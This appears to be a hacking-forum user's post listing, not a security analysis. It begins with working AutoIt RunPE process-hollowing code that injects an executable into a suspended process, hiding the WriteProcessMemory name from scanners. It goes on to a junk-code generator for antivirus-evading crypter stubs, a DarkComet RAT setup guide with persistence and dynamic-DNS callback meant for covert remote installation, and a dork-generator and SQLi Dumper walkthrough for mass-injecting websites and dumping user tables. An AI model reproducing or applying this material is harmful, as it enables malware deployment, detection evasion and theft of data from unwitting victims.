0) ; incompatible versions EndIf ; Extract entry point address Local $iEntryPointNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "AddressOfEntryPoint") ; if loaded binary image would start executing at this address ; And other interesting informations Local $iOptionalHeaderSizeOfHeadersNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "SizeOfHeaders") Local $pOptionalHeaderImageBaseNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "ImageBase") ; address of the first byte of the image when it's loaded in memory Local $iOptionalHeaderSizeOfImageNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, 
"SizeOfImage") ; the size of the image including all headers ; Move pointer $pPointer += 8 ; skipping IMAGE_DIRECTORY_ENTRY_EXPORT $pPointer += 8 ; size of $tIMAGE_DIRECTORY_ENTRY_IMPORT $pPointer += 24 ; skipping IMAGE_DIRECTORY_ENTRY_RESOURCE, IMAGE_DIRECTORY_ENTRY_EXCEPTION, IMAGE_DIRECTORY_ENTRY_SECURITY ; Base Relocation Directory Local $tIMAGE_DIRECTORY_ENTRY_BASERELOC = DllStructCreate("dword VirtualAddress; dword Size", $pPointer) ; Collect data Local $pAddressNewBaseReloc = DllStructGetData($tIMAGE_DIRECTORY_ENTRY_BASERELOC, "VirtualAddress") Local $iSizeBaseReloc = DllStructGetData($tIMAGE_DIRECTORY_ENTRY_BASERELOC, "Size") Local $fRelocatable If $pAddressNewBaseReloc And $iSizeBaseReloc Then $fRelocatable = True If Not $fRelocatable Then ConsoleWrite("!!!NOT RELOCATABLE MODULE. I WILL TRY BUT THIS MAY NOT WORK!!!" & @CRLF) ; nothing can be done here ; Move pointer $pPointer += 88 ; size of the structures before IMAGE_SECTION_HEADER (16 of them). #Region 6. ALLOCATE 'NEW' MEMORY SPACE Local $fRelocate Local $pZeroPoint If $fRelocatable Then ; If the module can be relocated then allocate memory anywhere possible $pZeroPoint = _RunBinary_AllocateExeSpace($hProcess, $iOptionalHeaderSizeOfImageNEW) ; In case of failure try at original address If @error Then $pZeroPoint = _RunBinary_AllocateExeSpaceAtAddress($hProcess, $pOptionalHeaderImageBaseNEW, $iOptionalHeaderSizeOfImageNEW) If @error Then _RunBinary_UnmapViewOfSection($hProcess, $pOptionalHeaderImageBaseNEW) ; Try now $pZeroPoint = _RunBinary_AllocateExeSpaceAtAddress($hProcess, $pOptionalHeaderImageBaseNEW, $iOptionalHeaderSizeOfImageNEW) If @error Then ; Return special error number: DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(101, 1, 0) EndIf EndIf EndIf $fRelocate = True Else ; And if not try where it should be $pZeroPoint = _RunBinary_AllocateExeSpaceAtAddress($hProcess, $pOptionalHeaderImageBaseNEW, $iOptionalHeaderSizeOfImageNEW) If @error 
Then
        _RunBinary_UnmapViewOfSection($hProcess, $pOptionalHeaderImageBaseNEW)
        ; Try now
        $pZeroPoint = _RunBinary_AllocateExeSpaceAtAddress($hProcess, $pOptionalHeaderImageBaseNEW, $iOptionalHeaderSizeOfImageNEW)
        If @error Then
            ; Return special error number:
            DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
            Return SetError(101, 0, 0)
        EndIf
    EndIf
EndIf

; If there is new ImageBase value, save it
DllStructSetData($tIMAGE_OPTIONAL_HEADER, "ImageBase", $pZeroPoint)

#Region 7. CONSTRUCT THE NEW MODULE
; Allocate enough space (in our space) for the new module
Local $tModule = DllStructCreate("byte[" & $iOptionalHeaderSizeOfImageNEW & "]")
; Get pointer
Local $pModule = DllStructGetPtr($tModule)
; Headers
Local $tHeaders = DllStructCreate("byte[" & $iOptionalHeaderSizeOfHeadersNEW & "]", $pHEADERS_NEW)
; Write headers to $tModule
DllStructSetData($tModule, 1, DllStructGetData($tHeaders, 1))
; Write sections now. $pPointer is currently in place of sections
Local $tIMAGE_SECTION_HEADER
Local $iSizeOfRawData, $pPointerToRawData
Local $iVirtualAddress, $iVirtualSize
Local $tRelocRaw
; Loop through sections
For $i = 1 To $iNumberOfSections
    $tIMAGE_SECTION_HEADER = DllStructCreate("char Name[8];" & _
            "dword UnionOfVirtualSizeAndPhysicalAddress;" & _
            "dword VirtualAddress;" & _
            "dword SizeOfRawData;" & _
            "dword PointerToRawData;" & _
            "dword PointerToRelocations;" & _
            "dword PointerToLinenumbers;" & _
            "word NumberOfRelocations;" & _
            "word NumberOfLinenumbers;" & _
            "dword Characteristics", _
            $pPointer)
    ; Collect data
    $iSizeOfRawData = DllStructGetData($tIMAGE_SECTION_HEADER, "SizeOfRawData")
    $pPointerToRawData = $pHEADERS_NEW + DllStructGetData($tIMAGE_SECTION_HEADER, "PointerToRawData")
    $iVirtualAddress = DllStructGetData($tIMAGE_SECTION_HEADER, "VirtualAddress")
    $iVirtualSize = DllStructGetData($tIMAGE_SECTION_HEADER, "UnionOfVirtualSizeAndPhysicalAddress")
    If $iVirtualSize And $iVirtualSize < $iSizeOfRawData Then $iSizeOfRawData = $iVirtualSize
    ; If there is data to write, write it
    If $iSizeOfRawData Then
        DllStructSetData(DllStructCreate("byte[" & $iSizeOfRawData & "]", $pModule + $iVirtualAddress), 1, DllStructGetData(DllStructCreate("byte[" & $iSizeOfRawData & "]", $pPointerToRawData), 1))
    EndIf
    ; Relocations
    If $fRelocate Then
        If $iVirtualAddress <= $pAddressNewBaseReloc And $iVirtualAddress + $iSizeOfRawData > $pAddressNewBaseReloc Then
            $tRelocRaw = DllStructCreate("byte[" & $iSizeBaseReloc & "]", $pPointerToRawData + ($pAddressNewBaseReloc - $iVirtualAddress))
        EndIf
    EndIf
    ; Move pointer
    $pPointer += 40 ; size of $tIMAGE_SECTION_HEADER structure
Next
; Fix relocations
If $fRelocate Then _RunBinary_FixReloc($pModule, $tRelocRaw, $pZeroPoint, $pOptionalHeaderImageBaseNEW, $iMagic = 523)
; Write newly constructed module to allocated space inside the $hProcess
$aCall = DllCall("kernel32.dll", "bool", _RunBinary_LeanAndMean(), _
        "handle", $hProcess, _
        "ptr", $pZeroPoint, _
        "ptr", $pModule, _
        "dword_ptr", $iOptionalHeaderSizeOfImageNEW, _
        "dword_ptr*", 0)
; Check for errors or failure
If @error Or Not $aCall[0] Then
    DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
    Return SetError(7, 0, 0) ; failure while writing new module binary
EndIf

#Region 8. PEB ImageBaseAddress MANIPULATION
; PEB structure definition
Local $tPEB = DllStructCreate("byte InheritedAddressSpace;" & _
        "byte ReadImageFileExecOptions;" & _
        "byte BeingDebugged;" & _
        "byte Spare;" & _
        "ptr Mutant;" & _
        "ptr ImageBaseAddress;" & _
        "ptr LoaderData;" & _
        "ptr ProcessParameters;" & _
        "ptr SubSystemData;" & _
        "ptr ProcessHeap;" & _
        "ptr FastPebLock;" & _
        "ptr FastPebLockRoutine;" & _
        "ptr FastPebUnlockRoutine;" & _
        "dword EnvironmentUpdateCount;" & _
        "ptr KernelCallbackTable;" & _
        "ptr EventLogSection;" & _
        "ptr EventLog;" & _
        "ptr FreeList;" & _
        "dword TlsExpansionCounter;" & _
        "ptr TlsBitmap;" & _
        "dword TlsBitmapBits[2];" & _
        "ptr ReadOnlySharedMemoryBase;" & _
        "ptr ReadOnlySharedMemoryHeap;" & _
        "ptr ReadOnlyStaticServerData;" & _
        "ptr AnsiCodePageData;" & _
        "ptr OemCodePageData;" & _
        "ptr UnicodeCaseTableData;" & _
        "dword NumberOfProcessors;" & _
        "dword NtGlobalFlag;" & _
        "byte Spare2[4];" & _
        "int64 CriticalSectionTimeout;" & _
        "dword HeapSegmentReserve;" & _
        "dword HeapSegmentCommit;" & _
        "dword HeapDeCommitTotalFreeThreshold;" & _
        "dword HeapDeCommitFreeBlockThreshold;" & _
        "dword NumberOfHeaps;" & _
        "dword MaximumNumberOfHeaps;" & _
        "ptr ProcessHeaps;" & _
        "ptr GdiSharedHandleTable;" & _
        "ptr ProcessStarterHelper;" & _
        "ptr GdiDCAttributeList;" & _
        "ptr LoaderLock;" & _
        "dword OSMajorVersion;" & _
        "dword OSMinorVersion;" & _
        "dword OSBuildNumber;" & _
        "dword OSPlatformId;" & _
        "dword ImageSubSystem;" & _
        "dword ImageSubSystemMajorVersion;" & _
        "dword ImageSubSystemMinorVersion;" & _
        "dword GdiHandleBuffer[34];" & _
        "dword PostProcessInitRoutine;" & _
        "dword TlsExpansionBitmap;" & _
        "byte TlsExpansionBitmapBits[128];" & _
        "dword SessionId")
; Fill the structure
$aCall = DllCall("kernel32.dll", "bool", "ReadProcessMemory", _
        "ptr", $hProcess, _
        "ptr", $pPEB, _ ; pointer to PEB structure
        "ptr", DllStructGetPtr($tPEB), _
        "dword_ptr", DllStructGetSize($tPEB), _
        "dword_ptr*", 0)
; Check for errors or failure
If @error Or Not $aCall[0] Then
    DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
    Return SetError(8, 0, 0) ; ReadProcessMemory function or call to it failed while filling PEB structure
EndIf
; Change base address within PEB
DllStructSetData($tPEB, "ImageBaseAddress", $pZeroPoint)
; Write the changes
$aCall = DllCall("kernel32.dll", "bool", _RunBinary_LeanAndMean(), _
        "handle", $hProcess, _
        "ptr", $pPEB, _
        "ptr", DllStructGetPtr($tPEB), _
        "dword_ptr", DllStructGetSize($tPEB), _
        "dword_ptr*", 0)
; Check for errors or failure
If @error Or Not $aCall[0] Then
    DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
    Return SetError(9, 0, 0) ; failure while changing base address
EndIf

#Region 9. NEW ENTRY POINT
; Entry point manipulation
Switch $iRunFlag
    Case 1
        DllStructSetData($tCONTEXT, "Eax", $pZeroPoint + $iEntryPointNEW)
    Case 2
        DllStructSetData($tCONTEXT, "Rcx", $pZeroPoint + $iEntryPointNEW)
    Case 3
        ; FIXME - Itanium architecture
EndSwitch

#Region 10. SET NEW CONTEXT
; New context:
$aCall = DllCall("kernel32.dll", "bool", "SetThreadContext", _
        "handle", $hThread, _
        "ptr", DllStructGetPtr($tCONTEXT))
If @error Or Not $aCall[0] Then
    DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
    Return SetError(10, 0, 0) ; SetThreadContext function or call to it failed
EndIf

#Region 11. RESUME THREAD
; And that's it! Continue execution:
$aCall = DllCall("kernel32.dll", "dword", "ResumeThread", "handle", $hThread)
; Check for errors or failure
If @error Or $aCall[0] = -1 Then
    DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
    Return SetError(11, 0, 0) ; ResumeThread function or call to it failed
EndIf

#Region 12. CLOSE OPEN HANDLES AND RETURN PID
DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $hProcess)
DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $hThread)
; All went well. Return new PID:
Return DllStructGetData($tPROCESS_INFORMATION, "ProcessId")
EndFunc

Func _RunBinary_LeanAndMean()
    Local $aArr[18] = ["W", "r", "i", "t", "e", "P", "r", "o", "c", "e", "s", "s", "M", "e", "m", "o", "r", "y"], $sOut
    For $sChar In $aArr
        $sOut &= $sChar
    Next
    Return $sOut
EndFunc

Func _RunBinary_FixReloc($pModule, $tData, $pAddressNew, $pAddressOld, $fImageX64)
    Local $iDelta = $pAddressNew - $pAddressOld ; dislocation value
    Local $iSize = DllStructGetSize($tData) ; size of data
    Local $pData = DllStructGetPtr($tData) ; address of the data structure
    Local $tIMAGE_BASE_RELOCATION, $iRelativeMove
    Local $iVirtualAddress, $iSizeofBlock, $iNumberOfEntries
    Local $tEnries, $iData, $tAddress
    Local $iFlag = 3 + 7 * $fImageX64 ; IMAGE_REL_BASED_HIGHLOW = 3 or IMAGE_REL_BASED_DIR64 = 10
    While $iRelativeMove < $iSize ; for all data available
        $tIMAGE_BASE_RELOCATION = DllStructCreate("dword VirtualAddress; dword SizeOfBlock", $pData + $iRelativeMove)
        $iVirtualAddress = DllStructGetData($tIMAGE_BASE_RELOCATION, "VirtualAddress")
        $iSizeofBlock = DllStructGetData($tIMAGE_BASE_RELOCATION, "SizeOfBlock")
        $iNumberOfEntries = ($iSizeofBlock - 8) / 2
        $tEnries = DllStructCreate("word[" & $iNumberOfEntries & "]", DllStructGetPtr($tIMAGE_BASE_RELOCATION) + 8)
        ; Go through all entries
        For $i = 1 To $iNumberOfEntries
            $iData = DllStructGetData($tEnries, 1, $i)
            If BitShift($iData, 12) = $iFlag Then ; check type
                $tAddress = DllStructCreate("ptr", $pModule + $iVirtualAddress + BitAND($iData, 0xFFF)) ; the rest of $iData is offset
                DllStructSetData($tAddress, 1, DllStructGetData($tAddress, 1) + $iDelta) ; this is what this is all about
            EndIf
        Next
        $iRelativeMove += $iSizeofBlock
    WEnd
    Return 1 ; all OK!
EndFunc

Func _RunBinary_AllocateExeSpaceAtAddress($hProcess, $pAddress, $iSize)
    ; Allocate
    Local $aCall = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", _
            "handle", $hProcess, _
            "ptr", $pAddress, _
            "dword_ptr", $iSize, _
            "dword", 0x1000, _ ; MEM_COMMIT
            "dword", 64) ; PAGE_EXECUTE_READWRITE
    ; Check for errors or failure
    If @error Or Not $aCall[0] Then
        ; Try differently
        $aCall = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", _
                "handle", $hProcess, _
                "ptr", $pAddress, _
                "dword_ptr", $iSize, _
                "dword", 0x3000, _ ; MEM_COMMIT|MEM_RESERVE
                "dword", 64) ; PAGE_EXECUTE_READWRITE
        ; Check for errors or failure
        If @error Or Not $aCall[0] Then Return SetError(1, 0, 0) ; Unable to allocate
    EndIf
    Return $aCall[0]
EndFunc

Func _RunBinary_AllocateExeSpace($hProcess, $iSize)
    ; Allocate space
    Local $aCall = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", _
            "handle", $hProcess, _
            "ptr", 0, _
            "dword_ptr", $iSize, _
            "dword", 0x3000, _ ; MEM_COMMIT|MEM_RESERVE
            "dword", 64) ; PAGE_EXECUTE_READWRITE
    ; Check for errors or failure
    If @error Or Not $aCall[0] Then Return SetError(1, 0, 0) ; Unable to allocate
    Return $aCall[0]
EndFunc

Func _RunBinary_UnmapViewOfSection($hProcess, $pAddress)
    DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", _
            "ptr", $hProcess, _
            "ptr", $pAddress)
    ; Check for errors only
    If @error Then Return SetError(1, 0, 0) ; Failure
    Return 1
EndFunc

Func _RunBinary_IsWow64Process($hProcess)
    Local $aCall = DllCall("kernel32.dll", "bool", "IsWow64Process", _
            "handle", $hProcess, _
            "bool*", 0)
    ; Check for errors or failure
    If @error Or Not $aCall[0] Then Return SetError(1, 0, 0) ; Failure
    Return $aCall[2]
EndFunc

The junk Function :

#cs ----------------------------------------------------------------------------
    AutoIt Version: 3.3.14.2
    Author:         CarrotInBLack
    Script Function:
        Create junk code for your AutoIt script very easily
        With:
            - _JunkCreate($Value)
              EXAMPLE: _JunkCreate(10) will create 10 random junk codes (functions, variables, IF/ELSE and For)
            - _RandomString()
              Creates a random string with 10-15 characters
#ce ----------------------------------------------------------------------------

Func _RandomVersion()
    $rVersion = ""
    Dim $aRr[3]
    $digits = Random(2, 4, 1)
    For $i = 1 To $digits
        $aRr[0] = Chr(Random(48, 57, 1)) & "."
        $aRr[1] = Chr(Random(48, 57, 1)) & "."
        $aRr[2] = Chr(Random(48, 57, 1)) & "."
        $arR2 = Chr(Random(48, 57, 1))
        $rVersion &= $aRr[Random(0, 2, 1)] & $arR2
    Next
    Return $rVersion
EndFunc

Func _RandomString()
    $rString = ""
    Dim $aRr[3]
    $digits = Random(10, 15, 1)
    For $i = 1 To $digits
        $aRr[0] = Chr(Random(65, 90, 1))
        $aRr[1] = Chr(Random(97, 122, 1))
        $aRr[2] = Chr(Random(48, 57, 1))
        $rString &= $aRr[Random(0, 2, 1)]
    Next
    Return $rString
EndFunc

Func _JunkVariables()
    $var = ""
    $varval = ""
    Dim $aRr[3]
    $digits = Random(10, 15, 1)
    For $i = 1 To $digits
        $aRr[0] = Chr(Random(65, 90, 1))
        $aRr[1] = Chr(Random(97, 122, 1))
        $aRr[2] = Chr(Random(48, 57, 1))
        $var &= $aRr[Random(0, 2, 1)]
        $varval &= $aRr[Random(0, 2, 1)]
        $variable = '$' & $var & ' = ' & '"' & $varval & '"' & @CRLF
    Next
    Return $variable
EndFunc

Func _JunkFor()
    $rString = _RandomString()
    $variable = _JunkVariables()
    $JunkFor = "For $" & $rString & " = 1 To " & Random(1, 15) & @CRLF & "    " & $variable & "Next" & @CRLF
    Return $JunkFor
EndFunc

Func _JunkIfElse()
    $rString = _RandomString()
    $rString2 = _RandomString()
    $variable = _JunkVariables()
    $JunkIf = 'If ' & '"' & $rString & '" == "' & $rString2 & '" Then' & @CRLF & '    ' & $variable & 'EndIf' & @CRLF
    Return $JunkIf
EndFunc

Func _FunJunk($Value)
    $JunkFun = ""
    Dim $Round[4]
    For $i = 1 To $Value
        $Round[0] = _JunkVariables()
        $Round[2] = _JunkFor()
        $Round[3] = _JunkIfElse()
        $JunkFun &= $Round[Random(0, 3, 1)]
    Next
    Return $JunkFun
EndFunc

Func _RanParameters($Value)
    $JunkParam = ""
    For $i = 1 To $Value
        $JunkParam = "$" & _RandomString() & ", "
    Next
    Return $JunkParam
EndFunc

Func _JunkFunc()
    $FuncName = ""
    $Parameters = ""
    $Lparam = ""
    Dim $aRr[3]
    $digits = Random(7, 10, 1)
    $digits2 = Random(2, 5, 1)
    $digits3 = Random(1, 3, 1)
    $lastP = _RandomString()
    $Lparam &= "$" & $lastP
    $Parameters &= _RanParameters($digits3)
    For $i = 1 To $digits
        $aRr[0] = Chr(Random(65, 90, 1))
        $aRr[1] = Chr(Random(97, 122, 1))
        $aRr[2] = Chr(Random(48, 57, 1))
        $FuncName &= $aRr[Random(0, 2, 1)]
        $RanFun = _FunJunk($digits2)
        $Function = 'Func ' & '_' & $FuncName & '(' & $Parameters & $Lparam & ')' & @CRLF & $RanFun & @CRLF & 'EndFunc' & @CRLF
    Next
    Return $Function
EndFunc

Func _JunkCreate($Value)
    $JunkCode = ""
    Dim $Round[4]
    For $i = 1 To $Value
        $Round[0] = _JunkVariables()
        $Round[1] = _JunkFunc()
        $Round[2] = _JunkFor()
        $Round[3] = _JunkIfElse()
        $JunkCode &= $Round[Random(0, 3, 1)]
    Next
    Return $JunkCode
EndFunc

This script includes:
- junk code generation
- icon changer
- file information randomizing
- randomizing the stub's variables and function names
  2. Backtracking

    DarkComet

    Note: In this format, the RAT program will quite easily be detected by anti-virus software. In order to evade such detection you will have to crypt the DarkComet RAT. It must become undetectable in order to use it stealthily. Or, the attacker might install such a program and add exceptions to the anti-virus.

    The newest versions are always the most stable. Let's say you use DarkComet 3.2. DarkComet 3.2 will be quite old by the writing of this blog. The system functions may have changed. DarkCoderSc has updated it to DarkComet 5.3.2 with the latest functions; it's like buying a can of Pepsi then finding it has gone off.

    Here is the tutorial on how to set up DarkComet 5.3.1.

    Go to the DarkComet website ([Hidden Content]). I would not get this RAT from anywhere else, lest it be crawling with gremlins. At the top, you will see a list of items. Click Downloads. Next there will be a list of DarkComet-RAT product versions. Click the top one. When you click Download, you will see three boxes. Tick them. Click Download.

    Open the DarkComet RAR (you need WinRAR). It should look like this:

    Make a folder on your desktop. Name it anything you want. Drag the items from the WinRAR folder to the Tutorial folder on your Desktop. Now, everything should be there like this:

    Open DarkComet.exe (Run as Administrator). A TOS should show up. Tick the box saying 'Do not display again the EULA' that is located at the bottom left. Click 'I accept'. At the bottom left, a Help Screen will show up; tick 'Do not show at startup' then click 'Fine'.

    Click DarkComet-RAT at the top left. Click 'Listen to new port (+Listen)'. A new window should open; put in your Port then tick 'Try to forward automaticaly (UPNP)'. In this case, I will do port 70 so I put that in, tick 'Try to forward automatically (UpNP)' and click Listen. Move over to 'Socket / Net' located at the very end of the top left border. You should see something like this:

    70 may not be your port; the port that you added in 'Listen to new port' will be displayed, not specifically 70. Go to 'www.canyouseeme.org'. Put in the port that you are listening on. If all went well, it should look like this:

    Now, click DarkComet-RAT again and click Server Module, then click Full Editor (Expert). Name your Security Password anything you like, then click the Mutex a few times. We then have the Main Settings done. Make sure you untick FWB (Firewall Bypass). Go to Network Settings.

    Now, go to [Hidden Content] and register. Click Free DNS. Put in whatever you want for it. Make sure the email is valid because we will need it to validate (if you don't want to give your email, get a temp email at 10minutemail.com). Sign in now. Now, in the Body you will see a list of options; click 'Add Host'. Copy the settings: leave IP Address, as that will show your IP address by default. Click Create Host.

    Go back to your DarkComet and put in the IP/DNS and Port (DNS for the NO-IP you made a second ago and Port for the one you listened on!). Then click 'Add' and go to Module Startup. Tick 'Start the stub with windows (module startup)'. Then leave everything but 'Persistance installation ( always come back )'. Tick that. Now, it should look like this:

    Now go to 'Stub Finalization' at the end. If you are going to get it crypted then don't tick UPX (Ultimate Packer Executable), but if you are, I would leave it off and just have it on No compression. Now tick 'Save the profile when stub succesfully generated' and Build the Stub.

    Now there is one last thing. Go to the Client Settings in DarkComet-RAT and then click NO-IP Updater. Then put in the NO-IP host, Username and Password, then tick 'Auto update your no-ip dns when your IP change'.

    Now, run the stub that you generated in a Sandbox to test, and you should show up! Here now, we have run through the entire thorough setup for DarkComet. Even your kid brother could follow this tutorial.

    Now what you need to do is some research into how to encrypt the EXE, so it can be installed remotely without an antivirus putting up a fuss. I know Metasploit has some pretty good encryption in its framework. I would start there. Watch out for others telling you they will encrypt it for you. This is usually a trick to just pack their own RAT into your stuff!
  3. Backtracking

    Dork Generator

    Dork Generator link : [Hidden Content]

    ================================= DORKS =================================

    When you open up the Dork generator tool there are 3 fields to fill out: Names/Keywords, Page Format, Page Type.

    -{Names Of Pages}-
    In this you put keywords related to the category of the sites you're looking for. You can do this manually but I would recommend using [Hidden Content]

    -{Page Format}-
    In this field most people just put .php? .asp? .aspx? .html? but if you have a lot of time to scan and you want HQ dorks you can add a lot of others like .cfm? .jsf? .htm? .tss? .file? .raw?

    -{Page Type}-
    I usually just put code_no= code= product= designer= framecode= idproduct= intCatalogID= intProdId= item= jobid= item_id= id= topic= NewsId= langid= article_id= cid= cartID= shopid=

    -{Exporting}-
    In the bottom right just click Generate Dorks; it could take a while. Once it is done it will create a file in the directory the tool is in.
  4. Backtracking

    SQLi Dumper

    ================================= Requirements =================================
    ~ Have a brain

    ================================= What will be in this post =================================
    ~ How to set up SQLI Dumper
    ~ How to make your own HQ dorks
    ~ How to use SQLI Dumper to inject sites

    ================================= Downloads =================================
    SQLI Dumper [Hidden Content]

    ================================= SQLI Dumper =================================

    -{Setting Up}-
    Go to the Keygen folder and run the file. Then copy the Key, run the SQLI Dumper file and use the key.

    -{Scanning}-
    Here is where you get to use the DORKS you made earlier. Go into the file that the dorks were generated in and copy them all. Now open up the SQLI Dumper tool; in the top left click "Online Scanner". Then under that click URL's Queue. Now in the big text field in the top middle paste in all the Dorks. Then go to the top right to "Start Scanner". To the left of that make sure that number is 10. Then click Start Scanner, then "URL's Only". Under "Online Scanner" and above URL's Queue it will say Queue, then a number. That number is how many sites are possibly exploitable.

    -{Exploitables}-
    Now after you have finished all the scanning hit cancel in the bottom right and click on "Exploitables" to the right of "URL's Queue". In the top right there is "Start Exploiter"; to the right of that change that number to 30. Then click "Start Exploiter" and wait for that to finish. Once it is at 100% you hit cancel.

    -{Injectables}-
    Now click "Injectables" to the right of "Exploitables", and in the top right there is "Start Analyzer"; change that number to the left to 20. Then click "Start Analyzer". After that is done click cancel.

    -{Data Dumper}-
    Now after you have some sites listed off in injectables you are ready to actually perform the attack. Find the site you want to start to attack, right click on it and hit "New Dumper" or "Go to Dumper". Once in the Data Dumper click Get Databases on top of the text field. Inside the text field there should be at least one database; click on that and hit "Get Tables". After all that loads in, look for useful tables; usually it will be named "users". Now click on whatever table you want to get the info out of and hit "Get Columns". It should list off a bunch of different info fields; check the boxes next to the ones you want to export and hit "Dump Data" in the top right of the text field. Finally after that is done click Export Data, click "Start" and save to where you want it.

    If this was helpful slap me a rating ?
  5. Backtracking

    Rules

    Agree
  6. Backtracking

    Backtracking

    Name : Backtracking
    Age : 23
    Why did you come to this forum? : Exploit
    What do you think you learn on the forum? : something useful
    What do you think you give to the forum? : Trainer
    What's your best specialty : Crypt